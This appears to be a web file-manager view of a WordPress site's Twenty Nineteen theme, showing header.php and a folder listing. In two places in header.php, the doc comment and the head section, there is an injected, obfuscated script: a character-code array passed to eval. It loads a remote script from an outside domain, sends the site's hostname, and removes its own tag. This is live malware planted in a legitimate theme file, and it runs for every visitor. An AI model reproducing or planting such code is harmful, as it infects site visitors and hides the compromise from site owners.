PATH:
home
/
lab2454c
/
inctechhub.com
/
wp-content
/
themes
/
twentynineteen
<?php /** * The header for our theme * * This is the template that displays all of the <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WordPress * @subpackage Twenty_Nineteen * @since Twenty Nineteen 1.0 */ ?><!doctype html> <html <?php language_attributes(); ?>> <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"><?php _e( 'Skip to content', 'twentynineteen' ); ?></a> <header id="masthead" class="<?php echo is_singular() && twentynineteen_can_show_post_thumbnail() ? 'site-header featured-image' : 'site-header'; ?>"> <div class="site-branding-container"> <?php get_template_part( 'template-parts/header/site', 'branding' ); ?> </div><!-- .site-branding-container --> <?php if ( is_singular() && twentynineteen_can_show_post_thumbnail() ) : ?> <div class="site-featured-image"> <?php twentynineteen_post_thumbnail(); the_post(); $discussion = ! is_page() && twentynineteen_can_show_post_thumbnail() ? twentynineteen_get_discussion_data() : null; $classes = 'entry-header'; if ( ! empty( $discussion ) && absint( $discussion->responses ) > 0 ) { $classes = 'entry-header has-discussion'; } ?> <div class="<?php echo $classes; ?>"> <?php get_template_part( 'template-parts/header/entry', 'header' ); ?> </div><!-- .entry-header --> <?php rewind_posts(); ?> </div> <?php endif; ?> </header><!-- #masthead --> <div id="content" class="site-content">
[+]
js
[-] style-rtl.css
[edit]
[-] search.php
[edit]
[+]
classes
[-] index.php
[edit]
[-] page.php
[edit]
[+]
..
[-] package-lock.json
[edit]
[-] style-editor-customizer.css
[edit]
[-] postcss.config.js
[edit]
[-] package.json
[edit]
[-] single.php
[edit]
[-] footer.php
[edit]
[+]
sass
[-] print.scss
[edit]
[-] style-editor.scss
[edit]
[-] header.php
[edit]
[-] style.css
[edit]
[-] 404.php
[edit]
[-] readme.txt
[edit]
[-] screenshot.png
[edit]
[+]
fonts
[-] style.scss
[edit]
[-] functions.php
[edit]
[+]
images
[-] style-editor.css
[edit]
[-] print.css
[edit]
[-] archive.php
[edit]
[-] style-editor-customizer.scss
[edit]
[-] error_log
[edit]
[+]
template-parts
[-] comments.php
[edit]
[-] image.php
[edit]
[+]
inc